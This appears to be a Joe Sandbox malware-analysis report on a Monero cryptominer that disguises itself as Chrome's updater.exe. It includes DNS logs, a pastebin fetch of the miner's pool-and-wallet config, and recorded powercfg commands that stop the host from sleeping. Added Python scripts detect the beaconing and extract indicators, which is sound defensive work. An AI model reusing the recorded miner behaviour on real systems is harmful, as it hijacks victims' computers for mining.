Dec 17, 2024 12:46:03.845988989 CET | 192.168.2.4 | 1.1.1.1 | 0xacfe | Standard query (0) | xmr-asia1.nanopool.org | A (IP address) | IN (0x0001) | false
Dec 17, 2024 12:46:04.946609974 CET | 192.168.2.4 | 1.1.1.1 | 0xf0a0 | Standard query (0) | pastebin.com | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Dec 17, 2024 12:46:03.991067886 CET | 1.1.1.1 | 192.168.2.4 | 0xacfe | No error (0) | xmr-asia1.nanopool.org |  | 51.79.145.144 | A (IP address) | IN (0x0001) | false
Dec 17, 2024 12:46:03.991067886 CET | 1.1.1.1 | 192.168.2.4 | 0xacfe | No error (0) | xmr-asia1.nanopool.org |  | 103.3.62.64 | A (IP address) | IN (0x0001) | false
Dec 17, 2024 12:46:03.991067886 CET | 1.1.1.1 | 192.168.2.4 | 0xacfe | No error (0) | xmr-asia1.nanopool.org |  | 172.104.165.191 | A (IP address) | IN (0x0001) | false
Dec 17, 2024 12:46:03.991067886 CET | 1.1.1.1 | 192.168.2.4 | 0xacfe | No error (0) | xmr-asia1.nanopool.org |  | 51.79.145.202 | A (IP address) | IN (0x0001) | false
Dec 17, 2024 12:46:05.084379911 CET | 1.1.1.1 | 192.168.2.4 | 0xf0a0 | No error (0) | pastebin.com |  | 104.20.4.235 | A (IP address) | IN (0x0001) | false
Dec 17, 2024 12:46:05.084379911 CET | 1.1.1.1 | 192.168.2.4 | 0xf0a0 | No error (0) | pastebin.com |  | 172.67.19.24 | A (IP address) | IN (0x0001) | false
Dec 17, 2024 12:46:05.084379911 CET | 1.1.1.1 | 192.168.2.4 | 0xf0a0 | No error (0) | pastebin.com |  | 104.20.3.235 | A (IP address) | IN (0x0001) | false
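
The packet list and DNS answers above show the miner's pool session: once the connection on port 10343 is up, the pool host 51.79.145.144 (one of the A records returned for xmr-asia1.nanopool.org) sends a packet roughly every ten seconds for the rest of the run, while the pastebin.com TLS flow is over within a second. The following is an added example, not part of the Joe Sandbox report, that reads packet rows as whitespace-separated timestamp, ports and addresses, groups server-to-client packets per flow, flags flows whose inter-arrival gaps are steady, and names the remote address from the DNS answers. The sample rows are a subset copied from this page; the LOCAL_NET prefix, the minimum number of gaps and the tolerance are assumptions.

```python
import re
import statistics
from collections import defaultdict
from datetime import datetime

LOCAL_NET = "192.168.2."  # assumed: the sandbox client network on this page

# Constructed sample: rows copied from this report's TCP packet list (the
# server-to-client packets of the port-10343 flow between 12:47:00 and 12:49:02,
# a couple of the client replies, and part of the short pastebin.com TLS flow),
# written as whitespace-separated "timestamp sport dport sip dip".
TCP_ROWS = """
Dec 17, 2024 12:46:06.328221083 CET 49731 443 192.168.2.4 104.20.4.235
Dec 17, 2024 12:46:06.329690933 CET 443 49731 104.20.4.235 192.168.2.4
Dec 17, 2024 12:46:06.899947882 CET 443 49731 104.20.4.235 192.168.2.4
Dec 17, 2024 12:46:06.913832903 CET 49732 10343 192.168.2.4 51.79.145.144
Dec 17, 2024 12:47:00.019067049 CET 10343 49732 51.79.145.144 192.168.2.4
Dec 17, 2024 12:47:00.065308094 CET 49732 10343 192.168.2.4 51.79.145.144
Dec 17, 2024 12:47:10.022248030 CET 10343 49732 51.79.145.144 192.168.2.4
Dec 17, 2024 12:47:20.037029028 CET 10343 49732 51.79.145.144 192.168.2.4
Dec 17, 2024 12:47:30.093190908 CET 10343 49732 51.79.145.144 192.168.2.4
Dec 17, 2024 12:47:40.047580957 CET 10343 49732 51.79.145.144 192.168.2.4
Dec 17, 2024 12:47:50.059048891 CET 10343 49732 51.79.145.144 192.168.2.4
Dec 17, 2024 12:48:00.067523003 CET 10343 49732 51.79.145.144 192.168.2.4
Dec 17, 2024 12:48:10.059845924 CET 10343 49732 51.79.145.144 192.168.2.4
Dec 17, 2024 12:48:20.070759058 CET 10343 49732 51.79.145.144 192.168.2.4
Dec 17, 2024 12:48:30.077368021 CET 10343 49732 51.79.145.144 192.168.2.4
Dec 17, 2024 12:48:42.082745075 CET 10343 49732 51.79.145.144 192.168.2.4
Dec 17, 2024 12:48:52.074160099 CET 10343 49732 51.79.145.144 192.168.2.4
Dec 17, 2024 12:49:02.104476929 CET 10343 49732 51.79.145.144 192.168.2.4
"""

# DNS answers from this report, keyed by queried name.
DNS_ANSWERS = {
    "xmr-asia1.nanopool.org": {"51.79.145.144", "103.3.62.64", "172.104.165.191", "51.79.145.202"},
    "pastebin.com": {"104.20.4.235", "172.67.19.24", "104.20.3.235"},
}

ROW_RE = re.compile(r"^(\w{3} \d{1,2}, \d{4} \d\d:\d\d:\d\d)\.(\d+) CET (\d+) (\d+) (\S+) (\S+)$")


def parse_rows(text):
    """Yield (datetime, sport, dport, sip, dip); nanosecond fractions are cut to
    microseconds because strptime's %f accepts at most six digits."""
    for line in text.strip().splitlines():
        m = ROW_RE.match(line.strip())
        if not m:
            raise ValueError(f"unparsable row: {line!r}")
        stamp, frac, sport, dport, sip, dip = m.groups()
        ts = datetime.strptime(f"{stamp}.{frac[:6]}", "%b %d, %Y %H:%M:%S.%f")
        yield ts, int(sport), int(dport), sip, dip


def find_beacons(text, dns_answers, min_gaps=5, tolerance=0.25, min_regular=0.75):
    """Flag flows whose server-to-client packets arrive at a steady cadence.
    A flow is (local port, remote ip, remote port). Cadence is the share of
    inter-arrival gaps that fall within +/- tolerance of the median gap, which
    tolerates the odd late packet (12 s instead of 10 s at 12:48:42 above)."""
    arrivals = defaultdict(list)
    for ts, sport, dport, sip, dip in parse_rows(text):
        if dip.startswith(LOCAL_NET) and not sip.startswith(LOCAL_NET):
            arrivals[(dport, sip, sport)].append(ts)
    rdns = {ip: name for name, ips in dns_answers.items() for ip in ips}

    findings = []
    for (lport, rip, rport), stamps in arrivals.items():
        stamps.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(stamps, stamps[1:])]
        if len(gaps) < min_gaps:
            continue  # one-shot flows (the config fetch) never qualify
        med = statistics.median(gaps)
        regular = sum(abs(g - med) <= tolerance * med for g in gaps) / len(gaps)
        if regular >= min_regular:
            findings.append({
                "remote": f"{rip}:{rport}",
                "resolved_name": rdns.get(rip),
                "median_gap_s": round(med, 2),
                "regularity": round(regular, 2),
                "packets": len(stamps),
            })
    return findings


if __name__ == "__main__":
    for f in find_beacons(TCP_ROWS, DNS_ANSWERS):
        print(f)
```

With the rows above, only the port-10343 flow qualifies (13 server packets, median gap 10.01 s, every gap within tolerance) and it resolves back to xmr-asia1.nanopool.org; the pastebin.com flow has too few packets to judge. On a real capture, run this per client address rather than on a single sandbox host, and treat the resolved name as the indicator rather than the IP, since the pool rotates between four A records.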
                                                                    • pastebin.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49731 | 104.20.4.235 | 443 | 7868 | C:\Windows\explorer.exe

Timestamp | Bytes transferred | Direction | Data
2024-12-17 11:46:06 UTC | 114 | OUT
    GET /raw/YLG9StR0 HTTP/1.1
    Accept: */*
    Connection: close
    Host: pastebin.com
    User-Agent: cpp-httplib/0.12.6
2024-12-17 11:46:06 UTC | 388 | IN
    HTTP/1.1 200 OK
    Date: Tue, 17 Dec 2024 11:46:06 GMT
    Content-Type: text/plain; charset=utf-8
    Transfer-Encoding: chunked
    Connection: close
    x-frame-options: DENY
    x-content-type-options: nosniff
    x-xss-protection: 1;mode=block
    cache-control: public, max-age=1801
    CF-Cache-Status: MISS
    Last-Modified: Tue, 17 Dec 2024 11:46:06 GMT
    Server: cloudflare
    CF-RAY: 8f36abb73fef4265-EWR
2024-12-17 11:46:06 UTC | 486 | IN
    Data Raw: 31 64 66 0d 0a 7b 0d 0a 20 20 20 20 22 61 6c 67 6f 22 3a 20 22 72 78 2f 30 22 2c 0d 0a 20 20 20 20 22 70 6f 6f 6c 22 3a 20 22 78 6d 72 2d 61 73 69 61 31 2e 6e 61 6e 6f 70 6f 6f 6c 2e 6f 72 67 22 2c 0d 0a 20 20 20 20 22 70 6f 72 74 22 3a 20 31 30 33 34 33 2c 0d 0a 20 20 20 20 22 77 61 6c 6c 65 74 22 3a 20 22 34 38 4c 58 52 46 70 47 36 61 53 56 39 31 6d 71 77 4b 44 38 6d 66 67 37 73 4e 59 47 71 36 52 4b 44 48 71 4d 6f 31 72 79 61 4d 6a 43 68 70 4b 41 69 7a 57 46 73 46 61 59 67 51 58 5a 45 46 4d 36 74 61 34 6f 4d 54 4a 61 62 35 62 41 77 35 47 66 6b 38 34 41 72 6f 4a 36 46 4e 44 33 58 44 52 22 2c 0d 0a 20 20 20 20 22 70 61 73 73 77 6f 72 64 22 3a 20 22 22 2c 0d 0a 20 20 20 20 22 6e 69 63 65 68 61 73 68 22 3a 20 66 61 6c 73 65 2c 0d 0a 20 20 20 20 22 73 73 6c
    Data Ascii: 1df{ "algo": "rx/0", "pool": "xmr-asia1.nanopool.org", "port": 10343, "wallet": "48LXRFpG6aSV91mqwKD8mfg7sNYGq6RKDHqMo1ryaMjChpKAizWFsFaYgQXZEFM6ta4oMTJab5bAw5Gfk84AroJ6FND3XDR", "password": "", "nicehash": false, "ssl
2024-12-17 11:46:06 UTC | 5 | IN
    Data Raw: 30 0d 0a 0d 0a
    Data Ascii: 0
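
The session above is the sample's configuration fetch: explorer.exe (PID 7868, the process the sample injected into) requests a raw paste with the cpp-httplib/0.12.6 User-Agent, and the chunked response is the XMRig configuration (algo rx/0, pool xmr-asia1.nanopool.org:10343, a 95-character Monero wallet). The report shows only the start of the 0x1df-byte chunk and cuts it off after "ssl. The following is an added example, not part of the Joe Sandbox report, that decodes a chunked body, extracts the pool endpoint and wallet as indicators, and checks the request metadata for the library-User-Agent-from-explorer.exe pattern. The JSON body is rebuilt from the fields visible on the page with a recomputed chunk size, so it is shorter than the captured one; the Monero address format check and the User-Agent prefix list are assumptions.

```python
import json
import re

# Constructed sample of the chunked HTTP/1.1 response body captured in this
# report. The page truncates the displayed chunk after `"ssl`, so the JSON here
# is rebuilt from the visible fields (algo, pool, port, wallet, password,
# nicehash) and the chunk-size line is recomputed for this shorter body instead
# of reusing the capture's 0x1df.
CONFIG_JSON = (
    '{\r\n'
    '    "algo": "rx/0",\r\n'
    '    "pool": "xmr-asia1.nanopool.org",\r\n'
    '    "port": 10343,\r\n'
    '    "wallet": "48LXRFpG6aSV91mqwKD8mfg7sNYGq6RKDHqMo1ryaMjChpKAizWFsFaYgQXZEFM6ta4oMTJab5bAw5Gfk84AroJ6FND3XDR",\r\n'
    '    "password": "",\r\n'
    '    "nicehash": false\r\n'
    '}'
)
CONFIG_BYTES = CONFIG_JSON.encode("utf-8")
# Chunked framing: <hex size>CRLF<data>CRLF ... 0 CRLF CRLF (the 5-byte final record above).
SAMPLE_BODY = f"{len(CONFIG_BYTES):x}\r\n".encode() + CONFIG_BYTES + b"\r\n0\r\n\r\n"

# Request metadata taken from the session table and request headers above.
SESSION = {"process": r"C:\Windows\explorer.exe", "host": "pastebin.com",
           "path": "/raw/YLG9StR0", "user_agent": "cpp-httplib/0.12.6"}


def dechunk(body: bytes) -> bytes:
    """Decode a chunked transfer-coded body into the payload bytes."""
    out = bytearray()
    pos = 0
    while True:
        nl = body.index(b"\r\n", pos)
        size = int(body[pos:nl].split(b";", 1)[0].strip(), 16)  # drop chunk extensions
        pos = nl + 2
        if size == 0:
            return bytes(out)  # a trailer section, if present, is not needed here
        out += body[pos:pos + size]
        pos += size
        if body[pos:pos + 2] != b"\r\n":
            raise ValueError("chunk data not followed by CRLF")
        pos += 2


# Assumed check: a Monero mainnet standard address is 95 base58 characters
# starting with '4' (base58 excludes 0, O, I and l).
MONERO_STD_ADDR = re.compile(r"^4[1-9A-HJ-NP-Za-km-z]{94}$")


def extract_miner_config(chunked_body: bytes) -> dict:
    """Reduce the fetched paste to the indicators a responder blocks and hunts on."""
    cfg = json.loads(dechunk(chunked_body).decode("utf-8"))
    wallet = cfg.get("wallet", "")
    return {
        "algo": cfg.get("algo"),
        "pool_endpoint": f'{cfg["pool"]}:{cfg["port"]}',
        "wallet": wallet,
        "wallet_is_monero_standard": bool(MONERO_STD_ADDR.match(wallet)),
        "nicehash": cfg.get("nicehash", False),
    }


LIBRARY_UA_PREFIXES = ("cpp-httplib/",)  # assumed list; the one seen on this page


def suspicious_paste_fetch(session: dict) -> bool:
    """explorer.exe never fetches raw pastes with an HTTP-library User-Agent;
    that combination is the injected loader seen in the session above."""
    return (session["process"].lower().endswith("\\explorer.exe")
            and session["host"] == "pastebin.com"
            and session["path"].startswith("/raw/")
            and session["user_agent"].startswith(LIBRARY_UA_PREFIXES))


if __name__ == "__main__":
    print(extract_miner_config(SAMPLE_BODY))
    print("suspicious fetch:", suspicious_paste_fetch(SESSION))
```

The pool endpoint and wallet are the durable indicators here: the paste can be edited at any time (the 1801-second cache-control on the response means a changed config reaches infected hosts within about half an hour), so a hunt should key on the wallet and the pool connection, not on the paste URL alone.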


                                                                    Target ID:0
                                                                    Start time:06:46:01
                                                                    Start date:17/12/2024
                                                                    Path:C:\Users\user\Desktop\c2.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:"C:\Users\user\Desktop\c2.exe"
                                                                    Imagebase:0x7ff632ae0000
                                                                    File size:5'737'472 bytes
                                                                    MD5 hash:EB0588E6420A0A2FB8B262554091ADD3
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:low
                                                                    Has exited:true

                                                                    Target ID:1
                                                                    Start time:06:46:01
                                                                    Start date:17/12/2024
                                                                    Path:C:\Windows\System32\cmd.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
                                                                    Imagebase:0x7ff653450000
                                                                    File size:289'792 bytes
                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:true

                                                                    Target ID:2
                                                                    Start time:06:46:01
                                                                    Start date:17/12/2024
                                                                    Path:C:\Windows\System32\conhost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                    Imagebase:0x7ff7699e0000
                                                                    File size:862'208 bytes
                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:true

                                                                    Target ID:5
                                                                    Start time:06:46:01
                                                                    Start date:17/12/2024
                                                                    Path:C:\Windows\System32\powercfg.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:powercfg /x -hibernate-timeout-ac 0
                                                                    Imagebase:0x7ff77c010000
                                                                    File size:96'256 bytes
                                                                    MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:moderate
                                                                    Has exited:true

                                                                    Target ID:8
                                                                    Start time:06:46:01
                                                                    Start date:17/12/2024
                                                                    Path:C:\Windows\System32\powercfg.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:powercfg /x -hibernate-timeout-dc 0
                                                                    Imagebase:0x7ff77c010000
                                                                    File size:96'256 bytes
                                                                    MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:moderate
                                                                    Has exited:true

                                                                    Target ID:9
                                                                    Start time:06:46:02
                                                                    Start date:17/12/2024
                                                                    Path:C:\Windows\System32\powercfg.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:powercfg /x -standby-timeout-ac 0
                                                                    Imagebase:0x7ff77c010000
                                                                    File size:96'256 bytes
                                                                    MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:moderate
                                                                    Has exited:true

                                                                    Target ID:10
                                                                    Start time:06:46:02
                                                                    Start date:17/12/2024
                                                                    Path:C:\Windows\System32\powercfg.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:powercfg /x -standby-timeout-dc 0
                                                                    Imagebase:0x7ff77c010000
                                                                    File size:96'256 bytes
                                                                    MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:moderate
                                                                    Has exited:true

                                                                    Target ID:13
                                                                    Start time:06:46:02
                                                                    Start date:17/12/2024
                                                                    Path:C:\Program Files\Google\Chrome\updater.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:"C:\Program Files\Google\Chrome\updater.exe"
                                                                    Imagebase:0x7ff602810000
                                                                    File size:5'737'472 bytes
                                                                    MD5 hash:EB0588E6420A0A2FB8B262554091ADD3
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Antivirus matches:
                                                                    • Detection: 100%, Avira
                                                                    • Detection: 100%, Joe Sandbox ML
                                                                    • Detection: 42%, ReversingLabs
                                                                    Reputation:low
                                                                    Has exited:true

                                                                    Target ID:14
                                                                    Start time:06:46:02
                                                                    Start date:17/12/2024
                                                                    Path:C:\Windows\System32\cmd.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
                                                                    Imagebase:0x7ff653450000
                                                                    File size:289'792 bytes
                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:true

                                                                    Target ID:15
                                                                    Start time:06:46:02
                                                                    Start date:17/12/2024
                                                                    Path:C:\Windows\System32\conhost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                    Imagebase:0x7ff7699e0000
                                                                    File size:862'208 bytes
                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:true

                                                                    Target ID:18
                                                                    Start time:06:46:02
                                                                    Start date:17/12/2024
                                                                    Path:C:\Windows\System32\powercfg.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:powercfg /x -hibernate-timeout-ac 0
                                                                    Imagebase:0x7ff77c010000
                                                                    File size:96'256 bytes
                                                                    MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:moderate
                                                                    Has exited:true

                                                                    Target ID:19
                                                                    Start time:06:46:02
                                                                    Start date:17/12/2024
                                                                    Path:C:\Windows\System32\conhost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\System32\conhost.exe
                                                                    Imagebase:0x7ff7699e0000
                                                                    File size:862'208 bytes
                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000013.00000002.4158581402.000001B6A8670000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: 00000013.00000002.4158581402.000001B6A8670000.00000004.00000001.00020000.00000000.sdmp, Author: unknown
                                                                    Has exited:false

                                                                    Target ID:20
                                                                    Start time:06:46:02
                                                                    Start date:17/12/2024
                                                                    Path:C:\Windows\System32\powercfg.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:powercfg /x -hibernate-timeout-dc 0
                                                                    Imagebase:0x7ff77c010000
                                                                    File size:96'256 bytes
                                                                    MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:true

                                                                    Target ID:21
                                                                    Start time:06:46:02
                                                                    Start date:17/12/2024
                                                                    Path:C:\Windows\System32\powercfg.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:powercfg /x -standby-timeout-ac 0
                                                                    Imagebase:0x7ff77c010000
                                                                    File size:96'256 bytes
                                                                    MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:true

                                                                    Target ID:22
                                                                    Start time:06:46:02
                                                                    Start date:17/12/2024
                                                                    Path:C:\Windows\System32\powercfg.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:powercfg /x -standby-timeout-dc 0
                                                                    Imagebase:0x7ff77c010000
                                                                    File size:96'256 bytes
                                                                    MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:true

                                                                    Target ID:23
                                                                    Start time:06:46:02
                                                                    Start date:17/12/2024
                                                                    Path:C:\Windows\explorer.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\explorer.exe
                                                                    Imagebase:0x7ff72b770000
                                                                    File size:5'141'208 bytes
                                                                    MD5 hash:662F4F92FDE3557E86D110526BB578D5
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000017.00000002.4158658044.0000000000D0F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000017.00000002.4158658044.0000000000D65000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                    Has exited:false

                                                                    Target ID:24
                                                                    Start time:06:46:03
                                                                    Start date:17/12/2024
                                                                    Path:C:\Program Files\Google\Chrome\updater.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:"C:\Program Files\Google\Chrome\updater.exe"
                                                                    Imagebase:0x7ff602810000
                                                                    File size:5'737'472 bytes
                                                                    MD5 hash:EB0588E6420A0A2FB8B262554091ADD3
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:true

                                                                    Target ID:25
                                                                    Start time:06:46:03
                                                                    Start date:17/12/2024
                                                                    Path:C:\Windows\System32\cmd.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
                                                                    Imagebase:0x7ff653450000
                                                                    File size:289'792 bytes
                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:true

                                                                    Target ID:26
                                                                    Start time:06:46:03
                                                                    Start date:17/12/2024
                                                                    Path:C:\Windows\System32\conhost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                    Imagebase:0x7ff7699e0000
                                                                    File size:862'208 bytes
                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:true

                                                                    Target ID:28
                                                                    Start time:06:46:03
                                                                    Start date:17/12/2024
                                                                    Path:C:\Windows\System32\powercfg.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:powercfg /x -hibernate-timeout-ac 0
                                                                    Imagebase:0x7ff77c010000
                                                                    File size:96'256 bytes
                                                                    MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:true

                                                                    Target ID:30
                                                                    Start time:06:46:03
                                                                    Start date:17/12/2024
                                                                    Path:C:\Windows\System32\powercfg.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:powercfg /x -hibernate-timeout-dc 0
                                                                    Imagebase:0x7ff77c010000
                                                                    File size:96'256 bytes
                                                                    MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:true

                                                                    Target ID:31
                                                                    Start time:06:46:03
                                                                    Start date:17/12/2024
                                                                    Path:C:\Windows\System32\powercfg.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:powercfg /x -standby-timeout-ac 0
                                                                    Imagebase:0x7ff77c010000
                                                                    File size:96'256 bytes
                                                                    MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:true

                                                                    Target ID:32
                                                                    Start time:06:46:04
                                                                    Start date:17/12/2024
                                                                    Path:C:\Windows\System32\powercfg.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:powercfg /x -standby-timeout-dc 0
                                                                    Imagebase:0x7ff77c010000
                                                                    File size:96'256 bytes
                                                                    MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:true

                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1693992544.00007FF632AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF632AE0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1693970971.00007FF632AE0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1694015215.00007FF632AE6000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1694413355.00007FF633055000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1694429558.00007FF633057000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1694446092.00007FF63305B000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1694446092.00007FF63305D000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1694484700.00007FF633060000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1694502516.00007FF633061000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7ff632ae0000_c2.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: beee64b2d3da2f3eb274e92f3c95c986217bc7b129019d4d5950de2641e42d74
                                                                      • Instruction ID: 8417d1f87a51c18aafca4b876cc635c908d455b7236c5c231fa2bd0711d8218f
                                                                      • Opcode Fuzzy Hash: beee64b2d3da2f3eb274e92f3c95c986217bc7b129019d4d5950de2641e42d74
                                                                      • Instruction Fuzzy Hash: 56B01230B18305C5F3002F25D88225C3220AB04B01F811034C80C93352CFBC54425710
                                                                      Memory Dump Source
                                                                      • Source File: 0000000D.00000002.1700966607.00007FF602811000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF602810000, based on PE: true
                                                                      • Associated: 0000000D.00000002.1700946103.00007FF602810000.00000002.00000001.01000000.00000004.sdmp
                                                                      • Associated: 0000000D.00000002.1700987964.00007FF602816000.00000004.00000001.01000000.00000004.sdmp
                                                                      • Associated: 0000000D.00000002.1701453875.00007FF602D87000.00000002.00000001.01000000.00000004.sdmp
                                                                      • Associated: 0000000D.00000002.1701481914.00007FF602D8B000.00000004.00000001.01000000.00000004.sdmp
                                                                      • Associated: 0000000D.00000002.1701503788.00007FF602D90000.00000008.00000001.01000000.00000004.sdmp
                                                                      • Associated: 0000000D.00000002.1701561350.00007FF602D91000.00000002.00000001.01000000.00000004.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_13_2_7ff602810000_updater.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: beee64b2d3da2f3eb274e92f3c95c986217bc7b129019d4d5950de2641e42d74
                                                                      • Instruction ID: 6a7c32b4ee99d95e1c8dc8cb70a9b853a9799724de73b284ed21fa762e9c398f
                                                                      • Opcode Fuzzy Hash: beee64b2d3da2f3eb274e92f3c95c986217bc7b129019d4d5950de2641e42d74
                                                                      • Instruction Fuzzy Hash: 3BB09264A2420584E3002B1198412682A206F14B04FA02120C50C82396CEEC94814720

                                                                      Execution Graph

                                                                      Execution Coverage:25%
                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                      Signature Coverage:12.1%
                                                                      Total number of Nodes:157
